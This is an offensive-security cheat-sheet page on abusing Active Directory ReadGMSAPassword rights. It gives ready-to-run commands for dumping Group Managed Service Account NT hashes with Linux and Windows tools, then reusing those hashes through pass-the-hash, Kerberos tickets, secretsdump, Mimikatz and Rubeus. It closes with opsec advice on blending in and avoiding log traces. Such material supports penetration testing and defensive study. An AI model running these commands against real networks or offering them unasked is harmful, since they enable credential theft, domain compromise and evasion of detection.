🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / ReadGMSAPassword

ReadGMSAPassword

Source principal is authorized to read the msDS-ManagedPassword attribute of a Group Managed Service Account (gMSA), yielding its NT hash.

Applies to: User/Group/Computer β†’ Computer (gMSA object)

Linux Abuse

gMSADumper.py

# https://github.com/micahvandeusen/gMSADumper
python3 gMSADumper.py -u <username> -p '<password>' -d <domain> -l <dc-ip>

# Pass-the-Hash
python3 gMSADumper.py -u <username> -p '<ntlm-hash>' -d <domain> -l <dc-ip> --ntlm

bloodyAD

bloodyAD -u <username> -p '<password>' -d <domain> --host <dc-ip> get search \
  --filter '(objectClass=msDS-GroupManagedServiceAccount)' \
  --attr msDS-ManagedPassword,sAMAccountName

# Pass-the-Hash
bloodyAD -u <username> -H '<ntlm-hash>' -d <domain> --host <dc-ip> get search \
  --filter '(objectClass=msDS-GroupManagedServiceAccount)' \
  --attr msDS-ManagedPassword,sAMAccountName

NetExec

netexec ldap <dc-ip> -u <username> -p '<password>' -d <domain> --gmsa

After hash retrieval β€” Pass-the-Hash

# Authenticate as the gMSA account
wmiexec.py -hashes ':<ntlm-hash>' '<domain>/<gmsa-account>$@<target>'
evil-winrm -i <target> -u '<gmsa-account>$' -H '<ntlm-hash>'
secretsdump.py -hashes ':<ntlm-hash>' '<domain>/<gmsa-account>$@<dc-ip>'

Kerberos ticket from gMSA hash

getTGT.py -hashes ':<ntlm-hash>' '<domain>/<gmsa-account>$'
export KRB5CCNAME=<ccache>

Windows Abuse

GMSAPasswordReader.exe

# https://github.com/rvazarkar/GMSAPasswordReader
.\GMSAPasswordReader.exe --accountname <gmsa-account>
# Output: current and previous NT hashes

DSInternals PowerShell Module

$gmsa = Get-ADServiceAccount -Identity '<gmsa-account>' -Properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
ConvertFrom-ADManagedPasswordBlob $mp

After hash retrieval

# Invoke-Mimikatz Pass-the-Hash
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<gmsa-account>$ /domain:<domain> /ntlm:<ntlm-hash>"'

# Rubeus overpass-the-hash
Rubeus.exe asktgt /user:<gmsa-account>$ /rc4:<ntlm-hash> /domain:<domain> /ptt

Opsec

  • Reading msDS-ManagedPassword generates Event ID 4662 (object access) on domain controllers
  • Requesting from the same context as an authorized computer account may blend in with legitimate access
  • gMSA passwords rotate automatically; hash valid until next rotation (default: 30 days)
  • Prefer Kerberos auth post-retrieval to avoid NTLM in logs